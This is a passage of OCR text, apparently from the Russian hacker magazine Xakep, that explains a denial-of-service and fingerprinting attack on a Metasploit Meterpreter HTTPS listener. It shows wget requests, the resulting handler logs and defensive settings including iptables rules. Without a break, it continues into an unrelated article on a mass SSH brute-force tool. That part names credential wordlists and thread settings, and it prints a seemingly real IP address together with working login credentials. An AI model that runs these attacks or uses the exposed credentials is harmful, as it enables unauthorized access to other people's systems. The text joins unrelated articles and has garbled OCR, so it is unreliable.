книги хакеры / журнал хакер / 207_Optimized

Мы уже как-то раз разбирали уязвимость в популярном сканере веб-уязвимо- стей Acunetix. Самое интересное, что через нее можно было атаковать атакующего. Теперь рассмотрим подобную возможность в Meterpreter из популярного фреймворка Metasploit.

Найденные уязвимости позволяют провести DoS-атаку на обработчик HTTPS-запросов этой утилиты. Процесс состоит из двух шагов.

1.Используя GET-запросы к известным файлам через handler/listener и проверяя наличие строки core_patch_url, узнаем о запущенной версии утилиты.

2.Используя вредоносный или недоделанный GET-запрос к определенным файлам

утилиты, можно попасть в открытую Meterpreter сессию и сделать так, чтобы сессии больше не принимались (DoS).

EXPLOIT

Виной всему порт, который использует утилита. Он доступен по URL (проверялось через HTTPS-протокол).

Доступный поURL порт для работы сMeterpreter

Там есть множество файлов, которые мы можем запросить через URL, и каждый из них, в свою очередь, вызывает разное поведение обработчика. От содержания и типа получаемых файлов зависит возможность определения наличия утилиты или проведения DoS-атаки.

Запустим свой handler с полезной нагрузкой в виде шелла meterpreter reverse_https.

$ wget -qO- --no-check-certificate https://192.168.1.1/chpwd.htm

...core_patch_url...LUDZ6djujGbWvte_gMomnQm7EQVgW7RJfg3xpGoDUgRe_

SdhLJBud68viiiDN1UsrniHZsjxLn9qYOo4YJIIU6K5ZnhNsuoGoPuWqKpQQVtxU6

L4EQg8ka9cZ4aJ-/

Ты уже заметил, что этот файл содержит строки core_patch_url и следующую за ней, сгенерированную случайным образом. На стороне listener в логах видим следующее:

73.x.x.x:47054 (UUID: 2d40d9e9d8ee8c66/x86=1/windows=1/2015-

12-19T05:50:27Z) Redirecting stageless connection from /chpwd.htm

with UA ‘Wget/1.16 (linux-gnu)’

Есть и альтернативный способ. Мы можем запросить файл blank.php. Это актуальный файл для listener, который представляет собой DLL-библиотеку.

$ wget --no-check-certificate https://666.666.666.666/blank.php

$ file blank.php: PE32 executable (DLL) (GUI) Intel 80386,

for MS Windows

Теперь в логах мы уже видим следующее:

[*]73.x.x.x:10458 (UUID: 376988d5161359f3/x86=1/windows=1/2015- 12-19T04:44:20Z) Staging Python payload ...

[*]Meterpreter session 57 opened (192.168.1.1:65535 ->

73.x.x.x:10458) at 2015-12-19 04:44:20 +0000

Запрос файла blank.php триггерит скрипт на Python и открывает сессию Meterpreter (правда, она неправильная и скоро будет закрыта).

[-] Meterpreter session 57 is not valid and will be closed

Лог самого Meterpreter подтверждает наличие ложной сессии. В итоге мы получаем DoS у handler, вызывая задержку между любой «правильной» полезной нагрузкой и handler/listener.

Помимо получения строки core_patch_url из chpwd.htm и бинарного blank. php, мы можем найти много информации среди доступных файлов (см. скриншоты).

Автор опубликовал исходники обоих скриптов:

•скрипт для DoS;

•скрипт для обнаружения.

Дополнительные подробности есть в статье автора эксплоита.

SOLUTION

Поумолчаниюlistenerсконфигурировантак,чторазрешенывсесоединенияслюбым UUID полезной нагрузки. Установи IgnoreUnknownPayloads true в своем скрипте или из консоли msfconsole переведи полезную нагрузку и listener в Paranoid Mode. Подробности можешь найти в wiki фреймворка.

Или настрой правила iptables:

iptables -I INPUT -p tcp -m tcp -s 0.0.0.0/0

--dport $LISTENER_PORT -j DROP

iptables -I INPUT -p tcp -m tcp -s $SHELL_IP

--dport $LISTENER_PORT -j ACCEPT

iptables -L

Список логинов и паролей задается параметром Login;Password. По умолчанию он берется из файла words.txt (рис. 3). Конечно, на рис. 3 список довольно убогий, но, думаю, в Сети ты без проблем найдешь более продвинутый (или можно проявить смекалку и создать свой).

Рис. 3.

Список логинов и паролей

Параметр Threads задает количество одновременных потоков для брута. По умолчанию используется значение 900 — этого более чем достаточно. Параметр Timeout определяет тайм-аут в секундах между попытками.

Что ж, осталось нажать кнопку Start. Программа в работе изображена на рис. 1. Как видишь, мы уже получили первые результаты. Проанализируем их:

Номер в квадратных скобках — это номер потока (для нас он не имеет значения). ДалееуказываетсясканируемыйIP-адрес.Строкаfailed to connectозначает, что порт SSH закрыт — или совсем, или для нас (брандмауэром). Строка вида [-]: admin;admin сообщает, что SSH-порт открыт, однако пароль и/или логин не подошел. А вот аналогичная строка с + говорит, что все удалось:

[5] 37.112.128.164 - [+]: ftp;123456

Это значит, что на машине с IP 37.112.128.164 крутится SSH, войти в систему можно, используя логин ftp и пароль 123456.

Результаты последнего удачного сканирования заносятся в файл brute_ good.txt. С этим файлом нужно быть очень осторожным — программа перезаписывает его при каждом нажатии кнопки Scan. Поэтому после каждого «улова» нужно делать бэкап этого файла.

Рис. 4.

Результат удачного сканирования записывается в файл brute_good.txt